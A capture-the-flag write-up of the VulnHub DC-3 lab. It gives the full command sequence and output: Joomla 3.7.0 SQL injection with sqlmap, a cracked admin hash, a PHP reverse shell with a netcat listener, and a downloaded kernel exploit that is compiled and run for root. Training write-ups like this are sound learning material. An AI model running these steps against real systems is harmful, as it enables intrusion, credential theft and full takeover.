Original Description
DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.
For those with experience doing CTF and Boot2Root challenges, this probably won’t take you long at all (in fact, it could take you less than 20 minutes easily).
If that’s the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag.
Recon
nmap
root@kali:~/vulnhub/dc3# nmap -sn 10.128.1.150-200
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-06 14:13 EST
Nmap scan report for DC3VM.stoeps.lab (10.128.1.156)
Host is up (0.00095s latency).
MAC Address: 00:0C:29:7F:2F:B8 (VMware)
root@kali:~/vulnhub/dc3# nmap -A -p- 10.128.1.156
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-06 14:13 EST
Nmap scan report for DC3VM.stoeps.lab (10.128.1.156)
Host is up (0.0011s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home
MAC Address: 00:0C:29:7F:2F:B8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 1.12 ms DC3VM.stoeps.lab (10.128.1.156)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.40 seconds
A short check with the browser shows us a Joomla webpage. Let’s check version and possible attacks.
joomscan
root@kali:~/vulnhub/dc3# apt install joomscan
root@kali:~/vulnhub/dc3# joomscan -u http://10.128.1.156
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://10.128.1.156 ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.7.0
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking Directory Listing
[++] directory has directory listing :
http://10.128.1.156/administrator/components
http://10.128.1.156/administrator/modules
http://10.128.1.156/administrator/templates
http://10.128.1.156/images/banners
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://10.128.1.156/administrator/
[+] Checking robots.txt existing
[++] robots.txt is not found
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config files are not found
Your Report : reports/10.128.1.156/
Not that detailed like with wpscan
, but enough infos for now. We know it’s Joomla 3.7.
searchsploit
root@kali:~/vulnhub/dc3# searchsploit joomla 3.7
----------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------- ----------------------------------------
Joomla! 3.7 - SQL Injection | exploits/php/remote/44227.php
Joomla! 3.7.0 - 'com_fields' SQL Injection | exploits/php/webapps/42033.txt
The file 42033.txt
tells us, that a call is vulnerable for sqlmap
.
42033.txt
...
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent \
--dbs -p list[fullordering]
...
Attack Joomla
SQLMAP
Get databases
sqlmap -u "http://10.128.1.156/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent \
-p list[fullordering] --dbs
...
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
...
Get tables
sqlmap -u "http://10.128.1.156/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent \
-p list[fullordering] -D joomladb --tables
...
Database: joomladb
[76 tables]
+---------------------+
| #__assets |
| ... |
| #__usergroups |
| #__users |
| #__utf8_conversion |
| #__viewlevels |
+---------------------+
...
- the user table
Dump table
sqlmap -u "http://10.128.1.156/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent \
-p list[fullordering] -D joomladb -T \#__users --dump
...
[14:39:05] [WARNING] unable to retrieve column names for table '#__users' in database 'joomladb'
[14:39:05] [INFO] fetching entries for table '#__users' in database 'joomladb'
[14:39:05] [INFO] used SQL query returns 1 entry
[14:39:05] [INFO] resumed: '0'
[14:39:05] [INFO] resumed: '0'
[14:39:05] [INFO] resumed: 'freddy@norealaddress.net'
[14:39:05] [INFO] resumed: '629'
[14:39:05] [INFO] resumed: '2019-04-01 20:27:08'
[14:39:05] [INFO] resumed: 'admin'
[14:39:05] [INFO] resumed: '{"admin_style":"","admin_language":"","language":"","editor":""...
[14:39:05] [INFO] resumed: '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu'
[14:39:05] [INFO] resumed: '2019-03-23 09:44:38'
[14:39:05] [INFO] resumed: '1'
[14:39:05] [INFO] resumed: 'admin'
Database: joomladb
Table: #__users
[1 entry]
Username
Hash
I put user and hash into a textfile user
.
user
admin:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
And run john the ripper on the file.
root@kali:~/vulnhub/dc3# john user
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
...
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
snoopy (admin)
1g 0:00:00:08 DONE 2/3 (2020-01-06 14:03) 0.1226g/s 108.5p/s 108.5c/s 108.5C/s 123456..buster
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/vulnhub/dc3# john --show user
admin:snoopy
1 password hash cracked, 0 left
got the password
Joomla login credentials
Remote Shell
Login to Joomla and go to /usr/share/webshells/php/php-reverse-shell.php
. Just change the ip
for netcat.
Now run nc -nlvp 1234
on Kali and open the Joomla page again.
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@DC3VM:/tmp$ uname -a
Linux DC3VM 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
www-data@DC3VM:/tmp$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS
Release: 16.04
Codename: xenial
Exploit and root flag
I searched for sudoer, sticky bit binaries and other stuff to get root. Finally I decided to use a kernel exploit.
searchsploit
root@kali:~/vulnhub/dc3# searchsploit ubuntu 16.04
----------------------------------------------------------------------------------------------------------------------- --------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------- --------------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution | exploits/linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation | exploits/linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download | exploits/linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation | exploits/linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Sta | exploits/linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privile | exploits/linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps | exploits/linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read | exploits/linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit) | exploits/linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak | exploits/linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation | exploits/linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation | exploits/linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation | exploits/linux/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation | exploits/linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Local Privilege Escalation | exploits/linux/local/40489.txt
- This one finally worked
DC-3 is a 32 bit machine, so we can save time and leave the 64 bit exploits.
Compile and run exploit
www-data@DC3VM:/tmp$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Saving to: '39772.zip'
39772.zip 100%[===================>] 6.86K --.-KB/s in 0.001s
2020-01-07 07:07:00 (11.2 MB/s) - '39772.zip' saved [7025/7025]
www-data@DC3VM:/tmp$ unzip 39772.zip
www-data@DC3VM:/tmp$ cd 39772
www-data@DC3VM:/tmp/39772$ ls
crasher.tar exploit.tar
www-data@DC3VM:/tmp/39772$ tar -xvf exploit.tar
www-data@DC3VM:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit
www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput.c hello.c suidhelper.c
www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ sh compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput doubleput.c hello hello.c suidhelper suidhelper.c
www-data@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@DC3VM:/tmp/39772/ebpf_mapfd_doubleput_exploit# cd /root
cd /root
root@DC3VM:/root# ls
ls
the-flag.txt
- Compile throws two warnings, but the exploit works
The flag
root@DC3VM:/root# cat the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
Congratulations are in order for completing DC-3VM. :-)
I hope you've enjoyed this challenge as much as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!
Final thoughts
This time we had to use sqlmap
for the first steps. First time without additional flags like in DC-1 and DC-2.
Thanks to @DCAU7 ! Seeing forward to the other machines in the DC Series